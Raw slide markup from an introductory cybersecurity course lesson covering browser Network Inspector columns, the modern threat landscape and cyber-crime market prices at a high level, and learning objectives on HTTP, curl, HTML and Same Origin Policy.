          <p:cNvPr id="1504" name="Google Shape;1504;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250" y="1697950"/>
            <a:ext cx="9144000" cy="4572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b="1" lang="en"/>
              <a:t>Status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column contains the HTTP response status code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1505" name="Google Shape;1505;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2221100"/>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b="1" lang="en"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column specifies the type of the data in the response body</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1506" name="Google Shape;1506;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-250" y="2743725"/>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b="1" lang="en"/>
              <a:t>Initiator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column specifies the part of the page, or the JavaScript function, that fired the request for the resource. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1507" name="Google Shape;1507;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3266350"/>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b="1" lang="en"/>
              <a:t>Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column specifies the size of the file, in bytes. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1508" name="Google Shape;1508;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="3788975"/>
            <a:ext cx="9144000" cy="4572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b="1" lang="en"/>
              <a:t>Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column specifies how long it took to fulfill the response</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1509" name="Google Shape;1509;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="9144000" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="1325875" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Waterfall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column specifies when a request was initiated, fulfilled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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217025" y="3348139"/>
            <a:ext cx="3258300" cy="452100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Creative and Sophisticated Attacks</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;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Cybersecurity &lt;&gt; Web Development</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;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061" name="Google Shape;1061;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204563" y="1181188"/>
            <a:ext cx="3283200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="Google Shape;1062;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872375" y="1664225"/>
            <a:ext cx="1743600" cy="1552800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E06666"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">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rgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Modern Threat Landscape</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1063" name="Google Shape;1063;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204575" y="2440613"/>
            <a:ext cx="3283200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1064" name="Google Shape;1064;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204575" y="3800238"/>
            <a:ext cx="3283200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229588" y="729213"/>
            <a:ext cx="3258300" cy="452100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Expanding Attack Surface</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241150" y="1988513"/>
            <a:ext cx="3517200" cy="452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a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Motivated and Well-Funded Threat Actors</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228563" y="1128988"/>
            <a:ext cx="3235200" cy="1021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Endpoint</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Network</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Cloud and SaaS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Users Mobile Devices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IoT</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241150" y="2440625"/>
            <a:ext cx="3235200" cy="1021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Malicious Insiders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Terrorists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Organized Crime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Hacktivists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Nation States</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241150" y="3750775"/>
            <a:ext cx="3235200" cy="1021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Spear-Phishing</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Custom Malware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Zero-Day Exploits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Social Engineering</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Physical Compromise</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4368425" y="1911875"/>
            <a:ext cx="751500" cy="6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a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Google Shape;1071;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487775" y="1181325"/>
            <a:ext cx="384600" cy="26190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flipH="1">
            <a:off x="5730000" y="1131125"/>
            <a:ext cx="384600" cy="2988300"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333"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3" name="Google Shape;1073;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1072" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6114600" y="1127225"/>
            <a:ext cx="2037900" cy="3900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6114600" y="4115475"/>
            <a:ext cx="2037900" cy="3900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885688" y="676888"/>
            <a:ext cx="3258300" cy="452100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Well-Established Cyber-Crime Economy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1076" name="Google Shape;1076;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6106450" y="1127225"/>
            <a:ext cx="2129400" cy="29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51C75"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>50¢ to $20</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="351C75"/>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Credit Card Number, Email Accounts (per 1,000)</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solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$7 to $8</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="741B47"/>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Cloud Accounts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solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Up to $50</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>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Per Healthcare Record</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solidFill>
                  <a:srgbClr val="B45F06"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Up to $3,500</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="B45F06"/>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Custom Malware</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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="85200C"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Up to $1,000/day</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="85200C"/>
              </a:solidFill>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DDoS Attack</a:t>
            </a:r>
            <a:endParaRPr sz="12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10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515" name="Google Shape;1515;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6" name="Google Shape;1516;p10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Student Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Resource Loading in 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watch the Net Inspector as you load a live web page and monitor for CORS headers in requested resources.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Instructions sent via Slack. </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2" name="Google Shape;1522;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607800" y="3425000"/>
            <a:ext cx="39537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Resource Loading</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528" name="Google Shape;1528;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529" name="Google Shape;1529;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0" name="Google Shape;1530;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9436800" cy="3421800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss how the threat landscape is growing due to the web.</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the network structure of the internet.</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the components of HTTP requests and responses.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Use the curl command to send the HTTP requests via the command line and interpret the contents of the resp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onses</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Distinguish between HTML, CSS, and Javascript within the context of front-end resources</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inspect the major features of an HTML document</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss Same Origin Policy and why it matters in a security context</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use the Network Inspector tool to analyze requests and responses</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1531" name="Google Shape;1531;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="13578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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="172339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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="2086936"/>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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="24504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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="326659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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="364629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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="402599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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="4419736"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="591850"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
